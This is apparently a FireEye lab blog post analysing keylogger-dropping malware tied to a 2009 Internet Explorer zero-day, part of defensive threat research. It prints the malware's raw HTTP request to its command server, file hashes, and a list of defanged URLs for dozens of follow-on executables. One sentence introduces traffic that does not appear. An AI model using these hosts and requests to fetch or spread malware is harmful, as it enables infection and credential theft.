FireEye Malware Intelligence Lab

Readers who are interested in learning more about the vulnerability might refer to these articles:

http://voices.washingtonpost.com/securityfix/2009/07/microsoft_internet_explorer_ex.html
http://isc.sans.org/diary.html?storyid=6733
http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799

Surprisingly, no detailed analysis of the underlying malware is yet available on the web (at least I was not able to find it). The primary purpose of this article is to bridge this gap.

Let's just start here.

MD5 = 6cf94b87cbeabfa0cec421f3e4827823

Packing  = NsPack

AV Coverage (Virus Total) = 95.12 %

Although the vulnerability is 0-day, the malware itself has been around for quite some time.  Upon execution this malware tries to contact its CnC server 'babi2009.com'. Here is what the first HTTP request looks like:

GET /360/aa1dfh.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: babi2009.com
Connection: Keep-Alive

The purpose of this HTTP GET request is to download a list of additional malware.

1:hxxp://haha888l.com/xiao/aa1.exe
1:hxxp://haha888l.com/xiao/aa2.exe
1:hxxp://haha888l.com/xiao/aa3.exe
1:hxxp://haha888l.com/xiao/aa4.exe
1:hxxp://haha888l.com/xiao/aa5.exe
1:hxxp://haha888l.com/xiao/aa6.exe
1:hxxp://haha888l.com/xiao/aa7.exe
1:hxxp://haha888l.com/xiao/aa8.exe
1:hxxp://haha888l.com/xiao/aa9.exe
1:hxxp://haha888l.com/xiao/aa10.exe
1:hxxp://haha999b.com/xiao/aa11.exe
1:hxxp://haha999b.com/xiao/aa12.exe
1:hxxp://haha999b.com/xiao/aa13.exe
1:hxxp://haha999b.com/xiao/aa14.exe
1:hxxp://haha999b.com/xiao/aa15.exe
1:hxxp://haha999b.com/xiao/aa16.exe

1:hxxp://haha999b.com/xiao/aa17.exe
1:hxxp://haha999b.com/xiao/aa18.exe
1:hxxp://haha999b.com/xiao/aa19.exe
1:hxxp://haha999b.com/xiao/aa20.exe
1:hxxp://haha999b.com/xiao/aa21.exe
1:hxxp://haha999b.com/xiao/aa22.exe
1:hxxp://haha999b.com/xiao/aa23.exe
1:hxxp://haha999b.com/xiao/aa24.exe
1:hxxp://haha999b.com/xiao/aa25.exe
1:hxxp://haha999b.com/xiao/aa26.exe
1:hxxp://haha999b.com/xiao/aa27.exe
1:hxxp://haha999b.com/xiao/aa28.exe
1:hxxp://haha999b.com/xiao/aa29.exe
1:hxxp://haha999b.com/xiao/aa30.exe
1:hxxp://haha999b.com/xiao/aa31.exe
1:hxxp://haha999b.com/xiao/aa32.exe
1:hxxp://haha999b.com/xiao/aa33.exe
1:hxxp://haha999b.com/xiao/aa34.exe
1:hxxp://haha999b.com/xiao/aa35.exe
1:hxxp://haha999b.com/xiao/aa36.exe
1:hxxp://haha999b.com/xiao/1.exe

One can see that there are lots of exes mentioned in the above list which are starting with aa**.exe. Although all these binaries have different MD5s, underneath there it is single piece of code, a keylogger.

A Threat Expert analysis for this key logger can be found here.

The only binary which is different from the rest is the last one 1.exe (B6941043CA9FA2E589C4B4BCE275C6D0). The outbound communication for this child download looks like this:

Definitely the above mentioned malware is just one instance currently exploiting this vulnerability. In the coming days we will see more malware being paired up with this exploit. Things will continue to get worse until Microsoft comes up with a patch.  We've already seen a huge spike of this malware infection through our Malware Analysis & Exchange (MAX) Network since the exploit was made public.

There are many details which I am leaving out for today, and I hope to come up with more in next few days.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM